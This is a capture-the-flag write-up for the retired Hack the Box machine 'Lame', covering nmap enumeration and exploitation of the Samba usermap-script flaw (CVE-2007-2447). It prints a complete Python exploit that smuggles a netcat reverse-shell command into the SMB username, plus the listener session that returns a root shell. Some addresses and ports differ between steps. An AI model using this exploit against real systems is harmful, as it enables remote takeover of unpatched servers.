Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.
Level: Beginner
Task: find user.txt and root.txt file in victim’s machine.
Let’s begin the Game!!
Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.
c:\Users\jacco>nmap -sV 10.10.10.3 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:00 W. Europe Standard Time Nmap scan report for 10.10.10.3 Host is up (0.033s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds
root@kali:/pwk# nmap --script smb-os-discovery.nse -p445 10.10.10.3 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 07:57 EDT Nmap scan report for 10.10.10.3 Host is up (0.033s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2019-08-17T04:59:42-04:00 Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds
From nmap results we saw samba service smbd 3.x is running in victim’s machine
CVE-2007-2447 – Samba usermap script.
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
Usage:
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
RHOST
— The target addressRPORT
— The target port (TCP : 139)LHOST
— The listen addressLPORT
— The listen port
Installation
sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
└──╼ $python usermap_script.py 10.10.10.3 445 10.10.14.10 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
root@kali:~/htb/lame# cat usermap.py #!/usr/bin/python # -*- coding: utf-8 -*- # From : https://github.com/amriunix/cve-2007-2447 # case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/ import sys from smb.SMBConnection import SMBConnection def exploit(rhost, rport, lhost, lport): payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago' username = "/=`nohup " + payload + "`" conn = SMBConnection(username, "", "", "") try: conn.connect(rhost, int(rport), timeout=1) except: print '[+] Payload was sent - check netcat !' if __name__ == '__main__': print('[*] CVE-2007-2447 - Samba usermap script') if len(sys.argv) != 5: print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>") else: print("[+] Connecting !") rhost = sys.argv[1] rport = sys.argv[2] lhost = sys.argv[3] lport = sys.argv[4] exploit(rhost, rport, lhost, lport)
Done. You should receive the connection to your listener:
root@kali:~/htb/lame# nc -lvp 443
listening on [any] 443 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.3] 52321
whoami
root
Inside path: /home/makis I found user.txt file
Inside path: /root I found root.txt file
Author: Jacco Straathof